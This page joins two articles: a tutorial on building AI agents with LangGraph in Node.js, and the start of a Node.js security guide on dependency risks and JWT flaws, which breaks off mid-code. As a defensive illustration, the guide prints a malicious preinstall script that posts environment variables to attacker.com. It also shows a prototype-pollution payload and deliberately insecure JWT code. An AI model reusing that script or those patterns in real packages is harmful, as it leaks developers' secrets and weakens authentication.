Build an AI Agent with JavaScript and LangGraph

Artificial intelligence has evolved far beyond just chat applications. Features powered by large language models (LLMs) are now being integrated into a growing number of apps and devices. Many web platforms offer not only AI chatbots but also intelligent search functions that help users find relevant content, as well as fraud detection systems that use anomaly detection to identify suspicious login attempts or fraudulent online payments. Let’s look at an example of how to build such an application using LangGraph.

One thing all the systems mentioned have in common is that they accept input and generate output based on their trained knowledge. This output can then be processed by the application and presented to the user. A concrete example of such an AI application is a smart lamp. It has been trained to respond to specific commands such as “Turn on the light,” “Dim the light to 50%,” or “Turn off the light at 10 p.m.” The system is limited by its architecture and training data.

AI agents address this problem. These are software components that are capable of making decisions independently and executing actions based on those decisions. In the example with the smart lamp, one goal for the AI agent could be to always provide the perfect lighting without you worrying about it. The agent observes when you wake up and how lighting conditions change with the weather and time of day. It decides when it makes sense to turn on the light. For instance, if you want to sleep longer on Sundays, the light will turn on later. The actions it takes might include gradually brightening the light in the morning when you wake up or shifting to a warmer color tone in the evening as you wind down. Over time, the AI agent learns more about your habits–for example, preferring to switch to cinema mode when you watch a movie in the evening or using more natural light in the afternoon.

The term AI agent is therefore not a new name for a semi-intelligent chatbot, but refers to software with very specific characteristics:

  • Autonomy: The AI agent can act independently within a certain framework. It does not work purely on a command basis, but continuously observes its environment and acts on its own initiative. This enables it to react to its environment and pursue its goals in the long term. In the case of the smart lamp, this means that you do not have to switch the light on and off yourself. Depending on the application, an AI agent can allow interactions and learn from them. This means that you can still control the light yourself. The agent will then adapt its behavior in the future so that intervention should no longer be necessary.
  • Goal orientation: The actions of an AI agent are usually determined by a specific goal or a combination of several goals.
  • Interaction with complex environments: AI agents play to their strengths above all in dynamic and unpredictable environments. If you work in such an environment with conventional architectures, you have to anticipate a wide variety of cases. An AI agent can respond to events in its environment, adapt its behavior, and get to know its environment better over time. The smart lamp not only takes the time of day into account in its actions, but also your behavior and habits, as well as external influences such as sunrise, sunset, or the weather.
  • Learning over a longer period of time: AI agents can learn from their environment. This includes both dynamic changes in the environment and interactions between people or other systems and the agent. The smart lamp not only turns the light on and off, but also ensures optimal lighting in different situations, whether you are reading a book, watching a movie, or preparing a meal.

For an AI agent to work, you must ensure that it can perceive its environment, give it a goal, and invest a certain amount of time in the initial learning process.

From Idea to Practice: AI Agents in JavaScript with LangGraph

AI agents can be implemented in different languages and on different platforms. The most commonly used languages are currently Python and JavaScript or TypeScript.

The LangChain library is available for both programming languages and lets you implement AI applications as chains of modules. LangGraph, a library for modeling and implementing AI agents, comes from the same team. In this article, we use the JavaScript version of this library on Node.js, a platform that stands out for its lightweight architecture and asynchronous I/O.

The library focuses on controlling data flows and states in the application. It allows you to integrate any models and tools. The most important terms in a LangGraph application are:

  • State: The state defines the data structure shared across the graph and stores the application’s variable data. Reducer functions attached to the state tell LangGraph how to apply updates to it.
  • Node: A graph generally consists of nodes and edges. In the specific case of LangGraph, a node is a JavaScript function that contains the agent’s logic. These functions can use an LLM, send queries to a search engine, or execute any local logic.
  • Edge: The edges of the graph connect the nodes of the graph and thus determine which node function is executed next.

A Concrete Example – What Time Is It?

To make things a little less abstract, let’s take a look at a concrete example. With this application, you can ask a locally executed LLM for the current time. If you use a simple local model such as Llama or Mistral, you can draw on an extensive knowledge base and be sure that your personal data will not be used for training purposes or analyzed in any other way. However, such a model cannot access current or dynamic data such as the date or time. In this example, you enrich the model with a function that returns the current date and time.

The implementation consists of two nodes: model, which is responsible for communicating with the LLM, and getCurrentDateTime, which contains the tool function for the date and time. The code in Listing 1 shows how the nodes are implemented and connected with edges.

Listing 1: LangGraph application with access to time and date

import { AIMessage, HumanMessage } from '@langchain/core/messages';
import { ToolNode } from '@langchain/langgraph/prebuilt';
import { StateGraph, MessagesAnnotation } from '@langchain/langgraph';
import { tool } from '@langchain/core/tools';
import { ChatOllama } from '@langchain/ollama';
import { z } from 'zod';

const getCurrentDateTime = tool(
  async () => {
    const now = new Date();
    const result = `Current date and time in UTC: ${now.toISOString()}`;
    return result;
  },
  {
    name: 'getCurrentDateTime',
    description: 'Returns the current date and time in UTC.',
    schema: z.object({}),
  }
);

const tools = [getCurrentDateTime];
const toolNode = new ToolNode(tools);

const model = new ChatOllama({ model: 'mistral-nemo' }).bindTools(tools);

function shouldContinue({ messages }: typeof MessagesAnnotation.State) {
  if ((messages[messages.length - 1] as AIMessage).tool_calls?.length) {
    return 'getCurrentDateTime';
  }
  return '__end__';
}

async function callModel(state: typeof MessagesAnnotation.State) {
  const response = await model.invoke(state.messages);
  return { messages: [response] };
}

const workflow = new StateGraph(MessagesAnnotation)
  .addNode('model', callModel)
  .addEdge('__start__', 'model')
  .addNode('getCurrentDateTime', toolNode)
  .addEdge('getCurrentDateTime', 'model')
  .addConditionalEdges('model', shouldContinue);

const app = workflow.compile();

const time = await app.invoke({
  messages: [new HumanMessage('How late is it?')],
});
console.log(time.messages.at(-1)?.content);

const timeMuc = await app.invoke({
  messages: [
    ...time.messages,
    new HumanMessage('And how late is it in Munich, Germany?'),
  ],
});

console.log(timeMuc.messages.at(-1)?.content);

The core of the implementation is the ToolNode, which supplies the LLM with current data. You create such a node by calling the tool function. You pass it the function that is to be behind the node. In this example, this function returns the current date and time as an ISO string. In addition to this function, you also define an object with meta information such as the name of the ToolNode, a description, and a schema. The bindTools method of the LLM instance is used to make the tools known. The LLM has access to the meta information and thus knows which tools are available to it for which purpose.

If the LLM receives a request that requires the current time, it does not answer directly but informs the application that the ToolNode should be executed. In this example, the tool function takes no additional parameters. However, you can also define parameters via the schema; the LLM fills them in when it requests the tool call, and you can access them inside the tool function. This allows you to control the execution of the function and deliver a suitable result. It is important to attach a description to each value in the schema using the describe method. The tool function alone does not yet create a node for LangGraph. To do this, you must pass the created tool in an array to the constructor of the ToolNode class.

The second node in the graph is the model. In the example, the ChatOllama class is used to integrate a local LLM provided by Ollama. Specifically, the mistral-nemo model is used. Which LLM you choose depends on a variety of factors: Do you want to use a local open-source model such as Mistral or Llama, or would you prefer a commercial model such as GPT-4o from OpenAI? If you decide on a local model, the question arises as to what resources are available to you and whether you should opt for a smaller and therefore more economical model, such as the 3B variant of Llama 3.2, or a large model such as the Llama 3.1 model with 405B parameters. The smaller model can run efficiently on a computer with a standard graphics card. The large models require powerful and therefore expensive hardware.

With these two nodes, you can now proceed to create the state graph for the application. When creating the graph, you pass a structure that defines the state structure and a reducer function for updating the state. LangGraph provides the MessagesAnnotation, which only provides a state key with the name messages and the associated reducer. The instance of the StateGraph class has the methods addNode for adding nodes and addEdge for connecting the nodes. Figure 1 shows the graph for the example.

Figure 1: Structure of the application graph

The graphical representation reveals another special feature. The addConditionalEdges method inserts a branch, which is implemented here in the shouldContinue function. It receives all messages and checks whether the last message from the model contains a tool call. If so, the process is forwarded to the ToolNode; otherwise, the run is terminated. A complete run through the graph looks like this:

  1. The edge labeled start marks the start of the graph and connects it to the model.
  2. The model node is executed. The model receives the prompt, processes it, and returns the result.
  3. The edge inserted with the addConditionalEdges method checks whether a Tool call is required. If this is not the case, the run is terminated with end. Otherwise, the edge connects the model to the ToolNode.
  4. The ToolNode is called and returns the current date and time.
  5. The edge connecting the ToolNode and the model ensures that the state enriched by the output of the Tool function is made available to the model.
  6. The model receives the extended prompt and can generate a response.
  7. The model does not require any further Tool calls, and the application is terminated by the conditional edge.

The compile method of the StateGraph instance creates an executable application to which you can pass any prompt using the invoke method. Assuming you call the application on December 1, 2025, at 3:02 p.m., you will receive the output “It’s currently 3:02 PM on December 1st.” As shown in the example, if you execute the invoke method again and pass the message history, the application does not execute another Tool call and uses the information from the previous run.

This example uses a tool node to counteract a weakness of LLMs: they know nothing about current or dynamic data. It also illustrates the essential features of a LangGraph application, but also the limitations you face when integrating smaller language models. The responses are not always consistent. For most queries, the model responds with a correct answer. The time returned here is in the UTC time zone. If you ask for the current time in a different time zone, as in the second prompt, you may get the correct answer, but you may also find that Munich is suddenly placed in a time zone 6 hours behind UTC. In addition, during testing, the results for German-language prompts were significantly worse than for the English version. To solve the time zone problem, you could, for example, register another tool that resolves time zones correctly and uses this information to obtain the correct time. In the next example application, you will learn about another use case for LangGraph that differs more significantly from the usual chatbot application.
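A sketch of such a time zone tool is shown below; the tool name, the timeZone parameter, and the use of Intl.DateTimeFormat are assumptions for illustration, and the tool would be registered in the tools array alongside getCurrentDateTime:

const getTimeInTimeZone = tool(
  async ({ timeZone }) => {
    // Format the current time in the requested IANA time zone
    const formatter = new Intl.DateTimeFormat('en-US', {
      timeZone,
      dateStyle: 'medium',
      timeStyle: 'short',
    });
    return `Current date and time in ${timeZone}: ${formatter.format(new Date())}`;
  },
  {
    name: 'getTimeInTimeZone',
    description: 'Returns the current date and time in a given IANA time zone, e.g. Europe/Berlin.',
    schema: z.object({
      timeZone: z.string().describe('IANA time zone identifier such as Europe/Berlin'),
    }),
  }
);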

This example already shows the essential features of a LangGraph application. The application consists of several nodes connected by edges. This architecture allows you to create both simple and very complex applications by assembling them from small, loosely coupled building blocks. The application gains additional flexibility because you can exchange nodes or insert new ones. You can also create conditions and thus take different paths through the graph at runtime. Although the time announcement example demonstrates some basic architectural features of LangGraph, it is still a long way from a real AI agent. For this reason, we will now look at another example of a LangGraph application that will introduce you to further features of an AI agent and show you other possible uses for the library.

Another Example: The Digital Shopping Cart

The following example relies less on an LLM to control the application and instead integrates an LLM to perform a very specific task. The rest of the application consists of a simple graph with a few additional nodes. The application is designed to evaluate images of products and recognize which and how many products are depicted. The products are placed in the shopping cart and the price for the individual products and the entire shopping cart is determined. At the end, the application outputs a tabular list of the shopping cart. The application is based on Node.js and is operated via the command line. The product images are stored in the file system and are read in when used. Communication takes place via command-line input.

One of the most common use cases for a LangGraph application is a chatbot. That’s why LangGraph also provides the MessagesAnnotation, which allows you to implement a message-based system without any further changes. However, you are not limited to this structure, but can model the state as you wish. The basis for this is provided by LangGraph’s Annotation structures. The GraphState of an application is structured like a tree and has a root node that you define with Annotation.Root. This then contains any object structure. Listing 2 shows how the GraphState of the sample application is structured.

Listing 2: Generating the GraphState

import { Annotation } from '@langchain/langgraph';
import { z } from 'zod';

const schema = z.object({
  totalPrice: z.number(),
  cart: z.array(
    z.object({
      image: z.string(),
      name: z.string().optional(),
      price: z.number().optional(),
      quantity: z.number().optional(),
    })
  ),
});

type StateType = z.infer<typeof schema>;
// A single cart entry, not the whole array
type CartItem = StateType['cart'][number];

const cartAnnotation = {
  totalPrice: Annotation<number>,
  cart: Annotation<CartItem[]>,
};

const State = Annotation.Root(cartAnnotation);

The GraphState contains two fields: the total price in the totalPrice property and the shopping cart in the cart property. You model the details of the state using LangGraph’s Annotation functions. These are implemented as TypeScript generics so that you can pass the type of the respective property. The total price is a simple number, and the shopping cart consists of an array of objects representing the individual products. If you do not specify anything else in the Annotation functions, LangGraph will overwrite the previous value in the state when a change is made. Alternatively, you can call the Annotation function and pass it an object with a reducer function and a default value. The reducer is then responsible for generating the new state of the StateGraph from the previous state and additional data. In our example, the node functions of the application itself take care of updating the state, so no separate reducer function is required.

The state not only represents the current state of the application, but also serves to exchange information between the individual nodes. The nodes do not simply pass information to each other, but store it in the state. This has the advantage that the state of the application can be better understood. This makes the application more flexible, as you are not dependent on fixed interfaces between the nodes. If you persist the state, you can pause the execution of the application and continue at the same point without losing any data.
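As a sketch of this idea, LangGraph ships checkpointers that you can pass when compiling the graph. The snippet below uses the in-memory MemorySaver; the thread_id value is an arbitrary assumption, and graph refers to the StateGraph instance that Listing 5 creates later:

import { MemorySaver } from '@langchain/langgraph';

// Compile the graph with a checkpointer so the state is stored between invocations
const persistentApp = graph.compile({ checkpointer: new MemorySaver() });

// Calls that share the same thread_id continue from the same persisted state
await persistentApp.invoke(
  { totalPrice: 0, cart: [] },
  { configurable: { thread_id: 'shopping-session-1' } }
);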

In addition to the state, the nodes and edges of the graph are the most important building blocks of the application. Figure 2 shows the nodes of the application and their connections. In the following, you will learn about the special features of the individual nodes and how they interact.

Figure 2: Visualization of GraphState

AskForNextProduct – Which Product Should Be Added?

The askForNextProduct node starts the process. It uses the Readline module from Node.js to query user input on the command line. The application expects the name of a file containing the image of a product. For example, you can enter “DSC_0435.jpg.” A file with this name must then be located in the application’s input directory and will be read in later in the graph. The node only takes care of querying the file name and must pass it on to the next node in the graph. So you need to save this info in the GraphState. To do this, the node adds a new element to the cart array and writes the file name to the image field. Entering a file name is a simplification for this app. At this point, you can implement any image source you want. For example, you can create a front end for the app and upload the images via the browser.

askForNextProduct has a special feature because it is connected to the detectProduct and showCart nodes via a ConditionalEdge. If you enter the string finished, this means that no further products should be added to the shopping cart and the shopping cart should be displayed. In this case, the ConditionalEdge calls the showCart node. In all other cases, the application continues with the detectProduct node to identify the product.
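A possible sketch of the askForNextProduct node and the conditional edge function follows; the exact prompt text is an assumption, and showCartOrDetectProduct is the function that Listing 5 later registers with addConditionalEdges:

import { createInterface } from 'node:readline/promises';

const askForNextProduct = async (state: StateType): Promise<StateType> => {
  const rl = createInterface({ input: process.stdin, output: process.stdout });
  // Ask for the next image file name (or "finished" to stop)
  const fileName = await rl.question('Image file of the next product (or "finished"): ');
  rl.close();
  // Store the file name in a new cart entry so the next node can pick it up
  return { ...state, cart: [...state.cart, { image: fileName }] };
};

const showCartOrDetectProduct = (state: StateType) => {
  // Route to showCart once the user types "finished", otherwise detect the product
  const lastImage = state.cart[state.cart.length - 1]?.image;
  return lastImage === 'finished' ? 'showCart' : 'detectProduct';
};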

DetectProduct – Product Recognition with a Vision Model

In the example in Listing 3, the detectProduct node uses the llama3.2-vision:11b model for image recognition. The prompt is important here. You specify the context, i.e., that the model is to be used for product recognition and that the number of products found is to be counted. You also specify the output format in the form of a JSON string with a concrete example. You can pass both the name of the file and a Base64-encoded image directly to the Ollama library used here. By formulating the prompt in this way, you make it very likely that you receive valid JSON as a response, which you can insert directly into the last element of the shopping cart array in GraphState.

Listing 3: detectProduct ToolNode

import { tool } from '@langchain/core/tools';
import ollama from 'ollama';

const detectProduct = tool(
  async (state: StateType): Promise<StateType> => {
    console.log('Detecting product...');

    const { message } = await ollama.chat({
      model: 'llama3.2-vision:11b',
      messages: [
        {
          role: 'user',
          content: `You are a vision model for a pet shop. What
            product do you see and how many are there? Answer in
            the following json string structure
            { "name": "name", "quantity": 1}`,
          images: [`./input/${state.cart[state.cart.length - 1].image}`],
        },
      ],
    });
    const visionModelResponse = JSON.parse(message.content);

    // Clone the cart array as well so the previous state is not mutated
    const clonedState = { ...state, cart: [...state.cart] };
    clonedState.cart[clonedState.cart.length - 1] = {
      ...clonedState.cart[clonedState.cart.length - 1],
      ...visionModelResponse,
    };
    return clonedState;
  },
  {
    name: 'detectProduct',
    description: 'Detects a product.',
    schema,
  }
);

CalculatePrice – Read Data from the Database

This is another simplification for our example. The CalculatePrice node reads the name of the product from the last element of the shopping cart array and uses it for a database query. The result is the price of the product you are looking for. You can make the search for the right product as complex as you like. A simple extension would be to normalize the spelling so that it doesn’t matter whether you search for “apple” or “apples.” You can also use a smart, AI-based product search, which significantly improves the application but also significantly increases the response time in most cases.

In the example, we assume that a match was found for the image and the product name derived from it. The calculatePrice function adds the price to the corresponding shopping cart item and passes control to the calculateTotalPrice node configured in the application.
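A minimal sketch of the calculatePrice node, assuming a hypothetical findPriceByName helper that performs the database query:

const calculatePrice = tool(
  async (state: StateType): Promise<StateType> => {
    const lastItem = state.cart[state.cart.length - 1];
    // Hypothetical database lookup that returns the price for a product name
    const price = await findPriceByName(lastItem.name);

    const clonedState = { ...state, cart: [...state.cart] };
    clonedState.cart[clonedState.cart.length - 1] = { ...lastItem, price };
    return clonedState;
  },
  {
    name: 'calculatePrice',
    description: 'Looks up the price for the most recently added product.',
    schema,
  }
);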

CalculateTotalPrice – Calculate the Sum

The calculateTotalPrice node is an example of a very simple operation. It uses the array reduce function to calculate the sum of the prices of all items in the shopping cart. In theory, you could also have a language model perform operations like this, but a calculation in the source code has the advantage that it always works, and you don’t have to worry about the language model starting to hallucinate and adding or omitting products or simply changing prices on its own. The code in Listing 4 also shows a convenience of LangGraph that allows you to update only part of the GraphState.

Listing 4: calculateTotalPrice ToolNode

const calculateTotalPrice = tool(
  async (state: StateType) => {
    console.log('Calculating total price...');
    const totalPrice = state.cart.reduce((acc, item) => {
      return acc + item.price! * item.quantity!;
    }, 0);
    console.log(`Current total price: ${totalPrice}`);
    return { totalPrice };
  },
  {
    name: 'calculateTotalPrice',
    description: 'Calculates the total price of the cart.',
    schema,
  }
);

As with the totalPrice property, if a node returns only part of the GraphState, LangGraph updates only that part. Here, another default behavior of the library comes into play: if you do not define a reducer function when creating the GraphState, LangGraph overwrites the previous value with the update. For a simple number, this is not a problem, but with an object structure such as the cart, it can be. In that case, you can implement the desired behavior yourself with a reducer.
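A sketch of such a reducer for the cart property; the concatenating merge shown here is only one possible strategy and would replace the plain Annotation<CartItem[]> declaration from Listing 2:

const cartAnnotationWithReducer = {
  totalPrice: Annotation<number>,
  cart: Annotation<CartItem[]>({
    // Merge updates into the existing cart instead of overwriting it
    reducer: (current, update) => current.concat(update),
    default: () => [],
  }),
};

const StateWithReducer = Annotation.Root(cartAnnotationWithReducer);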

After updating the total price, the loop in the StateGraph closes and the askForNextProduct node waits for the next input until the cycle is interrupted by the input of finished and the entire shopping cart is displayed.

ShowCart – Displaying the Shopping Cart

Before the application terminates, the shopping cart is displayed on the console. The showCart node uses the console.table function for this purpose and draws on the GraphState. This node only accesses the state in read-only mode and returns it unchanged. It is also the last node of the graph and is connected via an edge to the end node, which terminates the application.
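A minimal sketch of the showCart node, assuming the tabular output described above:

const showCart = tool(
  async (state: StateType): Promise<StateType> => {
    // Print the cart as a table and the total price below it
    console.table(state.cart);
    console.log(`Total price: ${state.totalPrice}`);
    return state;
  },
  {
    name: 'showCart',
    description: 'Prints the current shopping cart.',
    schema,
  }
);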

The Nodes and Edges of the Application

As in the previous example, you use the StateGraph class, to which you pass the configured state during instantiation. Use the addNode, addEdge, and addConditionalEdges functions to define the nodes and connect them with edges. Call the compile function on the resulting object and then start the application by calling the invoke method, as shown in Listing 5.

Listing 5: Registration of nodes and edges

import { StateGraph } from '@langchain/langgraph';

const graph = new StateGraph(State)
  .addNode('detectProduct', detectProduct)
  .addNode('calculatePrice', calculatePrice)
  .addNode('calculateTotalPrice', calculateTotalPrice)
  .addNode('showCart', showCart)
  .addNode('askForNextProduct', askForNextProduct)
  .addEdge('__start__', 'askForNextProduct')
  .addEdge('detectProduct', 'calculatePrice')
  .addConditionalEdges('askForNextProduct', showCartOrDetectProduct as any)
  .addEdge('calculatePrice', 'calculateTotalPrice')
  .addEdge('calculateTotalPrice', 'askForNextProduct')
  .addEdge('showCart', '__end__');

const app = graph.compile();

await app.invoke({ totalPrice: 0, cart: [] });

When starting, you pass an initial state structure and execution enters the StateGraph. The graph of this application forms a cycle. Here, you must be careful not to accidentally construct an infinite loop. LangGraph defines a limit of 25 cycle runs before it throws a GraphRecursionError. However, this only occurs if you do not integrate an interruption. This is relevant for the example because the keyboard input in the askForNextProduct node is not considered a termination condition for the cycle. The size of your application’s shopping cart is therefore limited by this restriction. To mitigate the restriction and increase the shopping cart size, pass an object with the property recursionLimit as the second argument to the invoke method when starting the application and define a value greater than 25. Of course, you can also pass a smaller value to test the effects of the restriction.
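For example, the start call with a raised limit could look like this; the value 100 is an arbitrary assumption:

await app.invoke(
  { totalPrice: 0, cart: [] },
  { recursionLimit: 100 }
);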

Conclusion

If your AI application consists solely of direct communication with a language model, it is usually sufficient to use the appropriate npm package, such as OpenAI or Ollama. However, if you want to integrate the model into a larger application context and use additional information sources or implement your own logic, an additional library is recommended. One example of this is LangChain. This tool allows you to flexibly link the individual components of your application together to form a chain. However, this architecture reaches its limits, especially in larger and more complex use cases. LangGraph, from the creators of LangChain, extends the architecture of an AI application to a graph in which you have the option of branching and looping.

The advantage of this graph architecture is that you can assemble your application from individual nodes. The edges connecting these nodes determine the control flow of the application, but not the data flow. The data in the graph is stored in the state, an object structure that you can design according to your needs. This central state allows you to persist the state of your application, pause it if necessary, and resume it at a later point in time.

The nodes are independent of the actual application, so you can move their implementation to a library or package and achieve reusability across application boundaries. All you have to do is make sure that the underlying state structure fits, which is easy with Zod for schema definition and validation and with TypeScript for typing.

🔍 Frequently Asked Questions (FAQ)

1. What is LangGraph and how does it differ from LangChain?

LangGraph is a library for building AI agents using graph-based architecture in JavaScript or TypeScript. Unlike LangChain, which connects components in a linear chain, LangGraph uses nodes and edges to model dynamic control flows including branching and looping.

2. How do AI agents differ from traditional LLM-powered applications?

AI agents act autonomously within defined environments, continuously observe their surroundings, and make decisions based on long-term goals. This is in contrast to typical LLM applications, which respond only to direct prompts without proactive behavior.

3. What are the core components of a LangGraph application?

The three main components are nodes (functions that perform tasks), edges (transitions between nodes), and the state (a shared data object accessible and modifiable by all nodes). Conditional edges add branching logic, while annotations and reducer functions control how the state is structured and updated.

4. Can LangGraph applications access real-time data?

Yes. LangGraph can integrate tools as nodes—for instance, a node that returns the current UTC date and time—allowing applications to supplement static model knowledge with dynamic, real-world data.

5. What role does the ToolNode play in a LangGraph setup?

The ToolNode provides real-time or auxiliary functionality by executing predefined logic, such as accessing current timestamps or running a custom function. It can be triggered by the model when a specific task cannot be completed with its internal knowledge alone.

6. How does LangGraph handle conditional logic and tool invocation?

LangGraph supports conditional edges via methods like addConditionalEdges. These allow the graph to evaluate conditions (e.g., tool calls in the model output) and dynamically choose which node to execute next.

7. How does the digital shopping cart example showcase LangGraph’s flexibility?

The digital shopping cart uses LangGraph nodes for reading product images, recognizing items via vision models, querying a database for prices, and calculating totals. This highlights how LangGraph enables stateful, multi-step applications beyond basic chatbot use cases.

8. Why is centralized state important in LangGraph applications?

Centralized state allows for easy debugging, flexible data exchange between nodes, and the ability to persist and resume sessions. This design makes LangGraph particularly suited for complex workflows that require memory and context retention across multiple steps.

Preventing Dependency Risks and Authentication Flaws in Node.js

Node.js revolutionized the web development paradigm with its event-driven, non-blocking architecture and is used for building scalable applications. But with its popularity, comes more attention from malicious actors looking to take advantage of vulnerabilities. This article examines the growing security challenge surrounding dependency risks, authentication flaws, rate limiting, and more.

In Part 1 of our series, we explored some of the most common attack vectors against Node.js applications, from SQL and NoSQL injection to Cross-Site Scripting (XSS) attacks. But these threats are not the only security issues that Node.js developers face today; they are only part of the picture.

In this second part of our series, we will discuss lesser known, but no less dangerous threats that are specifically targeted at Node.js applications. From prototype pollution to insecure deserialization, authentication flaws to server-side request forgery – understanding these threats and their remediation strategies is crucial for secure application development in the current threat environment. Learn all about these Node.js security risks and how to prevent them.

Dependency Risks in the JavaScript Ecosystem

Security problems in the JavaScript ecosystem are closely tied to its heavy use of dependencies. A typical Node.js project depends on hundreds of third-party packages, which creates a huge attack surface that isn’t contained in your own code. Recent supply chain attacks on popular npm packages have shown exactly that. Not every security threat can be guarded against, but frameworks like Express.js, Fastify, and NestJS do provide some protection. Nevertheless, the duty falls to developers to include security checks and measures at every stage of the application development process.

Topic 1 – Node.js Security & Dependency Management Vulnerabilities

Outdated Packages and Security Implications

It’s normal for modern Node.js applications to depend on several dozen or even hundreds of dependencies. Each outdated package is a potential security hole that’s left unpatched in your application.

The npm ecosystem is quite dynamic, and vulnerabilities are regularly uncovered and patched in widely used packages. This means that dependencies that aren’t updated regularly can leave your application exposed to exploitation even though a fix is already available.

Example: Say a team is using the popular lodash package v4.17.15 in their application. This package version has a prototype pollution vulnerability that was fixed in version 4.17.19. This vulnerability lets attackers manipulate prototypes of JavaScript objects and, in certain circumstances, cause application crashes or even remote code execution.

This type of vulnerability is particularly dangerous because lodash is a dependency of over 150,000 other packages, which means it’s spread throughout the ecosystem. The longer teams delay updates, the longer their applications are vulnerable.
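To illustrate the class of bug with a generic sketch (not the actual lodash internals), a naive deep merge that copies keys without filtering lets a crafted payload write to Object.prototype:

// Naive deep merge without key filtering – do not use in production
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (typeof source[key] === 'object' && source[key] !== null) {
      target[key] = unsafeMerge(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker-controlled JSON payload
const payload = JSON.parse('{"__proto__": {"isAdmin": true}}');
unsafeMerge({}, payload);

// Every plain object now appears to have isAdmin set
console.log(({}).isAdmin); // true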

Mitigation Strategy: Audit the packages at regular time intervals.

# Identify vulnerabilities in your dependencies
npm audit

# Fix vulnerable dependencies
npm audit fix

# For major version updates that npm audit fix can't automatically resolve
npm audit fix --force

Supply Chain Attacks

Supply chain attacks exploit the trust relationship between developers and package maintainers. Malicious actors compromise a trusted package or its distribution channel in order to inject code into the supply chain.

Example Scenario: The event-stream incident of 2018 demonstrated the risks perfectly. A malicious actor was able to gain the trust of the package maintainer and was granted publishing rights to the package. They injected cryptocurrency stealing code that targeted Copay Bitcoin wallet users.

Attack Workflow:

  1. Attacker identifies a popular package with an inactive maintainer
  2. Attacker offers to help maintain the package
  3. Original maintainer grants publishing rights
  4. Attacker publishes a new version with malicious code
  5. Downstream applications automatically update to the compromised version

Mitigation Strategies: In package.json, use exact versions instead of ranges.

//In package.json, use exact versions instead of ranges
{
  "dependencies": {
    "express": "4.17.1",  // Good: exact version
    "lodash": "^4.17.20"  // Risky: accepts any 4.x version at or above 4.17.20
  }
}

//Use package-lock.json or npm shrinkwrap to lock all dependencies

//Example using npm-package-integrity:
const integrity = require('npm-package-integrity');

integrity.check('./package.json').then(results => {
  if (results.compromised.length > 0) {
    console.error('Compromised packages detected:', results.compromised);
    process.exit(1);
  }
});

Dependency Confusion Attacks

Dependency confusion attacks exploit the fact that package managers may resolve dependencies from both public and private registries. If a package with the same name as one of your private packages is published to the public registry with a higher version number, the package manager may pull the malicious public version instead of the private one.

Example Attack Scenario: Your company uses a private package called @company/api-client 1.2.3. The attacker identifies this package name in your public repository’s package.json and releases a malicious package with the same name but version 2.0.0 to the public npm registry. The next time dependencies are installed, npm finds the higher version in the public registry and installs the attacker’s package.

Example Workflow:

When the malicious package is installed, the attacker can run an arbitrary script automatically, for example via a preinstall hook:
// Malicious package preinstall script
// This runs automatically when the package is installed
const fs = require('fs');
const https = require('https');

// Stealing environment variables
const data = JSON.stringify({
  env: process.env,
  path: process.cwd()
});

// Sending data to attacker's server
const req = https.request({
  hostname: 'attacker.com',
  port: 443,
  path: '/collect',
  method: 'POST',
  headers: {'Content-Type': 'application/json'}
}, res => {});

req.write(data);
req.end();

Mitigation Strategies:

Use Scoped Packages: Scoped packages in npm help ensure that your packages are uniquely identified. For example, use @yourcompany/package-name instead of just package-name.

{
  "name": "my-project",
  "version": "1.0.0",
  "dependencies": {
    "@yourcompany/internal-package": "1.2.3"
  },
  "publishConfig": {
    "registry": "https://registry.yourcompany.com"
  }
}

In this example, the following measures are taken:

  • The package is scoped with @yourcompany to ensure uniqueness.
  • The publishConfig ensures that the package manager uses your private registry.
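To enforce this on the install side as well, the scope can be mapped to the private registry in the project’s .npmrc file; the registry URL below is a placeholder:

# .npmrc – resolve all @yourcompany packages from the private registry
@yourcompany:registry=https://registry.yourcompany.com/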

Topic 2 – Authentication Flaws Threatening Node.js Security

JSON Web Token (JWT) Vulnerabilities – JWTs are among the most common means of authentication in Node.js apps, particularly for RESTful APIs. However, they are frequently implemented incorrectly.

Common JWT Vulnerabilities:

  1. Weak Signing Algorithms: Using the none algorithm or insecure choices such as HMAC with short keys.
  2. Insecure Token Storage: Saving tokens in localStorage instead of using HttpOnly cookies.
  3. Missing Token Validation: Failing to check a token’s signature, expiration, issuer, or audience.
  4. Hardcoded Secrets: Using hardcoded secrets in the source code.

Example of Vulnerable JWT Implementation:

const jwt = require('jsonwebtoken');

// Hardcoded secret in source code
const secret = 'mysecretkey';

app.post('/login', (req, res) => {
  // Create token with no expiration or audience validation
  const token = jwt.sign({ userId: user.id }, secret);
  res.json({ token });
});

app.get('/protected', (req, res) => {
  try {
    // No token validation or structure checks
    const token = req.headers.authorization.split(' ')[1];
    const decoded = jwt.verify(token, secret);

    // No additional checks on decoded token content
    res.json({ data: 'Protected resource' });
  } catch (error) {
    res.status(401).json({ error: 'Unauthorized' });
  }
});

In the above example code, there are multiple issues:

Hard Coded Secret

  • Problem: The secret key is stored in the source code.
  • Risk: If the source code is exposed, the secret key is exposed with it and can be used to forge valid tokens.

No Token Expiration

  • Problem: The JWT is created without an expiration date.
  • Risk: Once issued, tokens can be used for an indefinite period of time if they are compromised.

Plain Text Token Transmission

  • Problem: The token is sent in plaintext in the response.
  • Risk: If tokens aren’t sent over HTTPS, they can be easily intercepted.

No Token Validation or Structure Checks

  • Issue: The token is extracted and verified without checking its claims.
  • Risk: Malformed or tampered tokens can bypass security checks.

Improved code with Secure JWT Implementation:

const jwt = require('jsonwebtoken');
require('dotenv').config();

// Load JWT secret from environment variable
const secret = process.env.JWT_SECRET;
if (!secret || secret.length < 32) {
  throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');
}

app.post('/login', async (req, res) => {
  // Create token with proper claims
  const token = jwt.sign(
    {
      userId: user.id,
      role: user.role
    },
    secret,
    {
      expiresIn: '1h',
      issuer: 'my-app',
      audience: 'my-api',
      notBefore: 0
    }
  );

  // Send token in HttpOnly cookie
  res.cookie('token', token, {
    httpOnly: true,
    secure: process.env.NODE_ENV === 'production',
    sameSite: 'strict',
    maxAge: 3600000 // 1 hour
  });

  res.json({ message: 'Authentication successful' });
});

app.get('/protected', (req, res) => {
  try {
    // Extract token from cookie (not from headers; requires the cookie-parser middleware)
    const token = req.cookies.token;

    if (!token) {
      return res.status(401).json({ error: 'Authentication required' });
    }

    // Verify token with all necessary options
    const decoded = jwt.verify(token, secret, {
      issuer: 'my-app',
      audience: 'my-api'
    });

    // Additional validation
    if (decoded.role !== 'admin') {
      return res.status(403).json({ error: 'Insufficient permissions' });
    }

    res.json({ data: 'Protected resource' });
  } catch (error) {
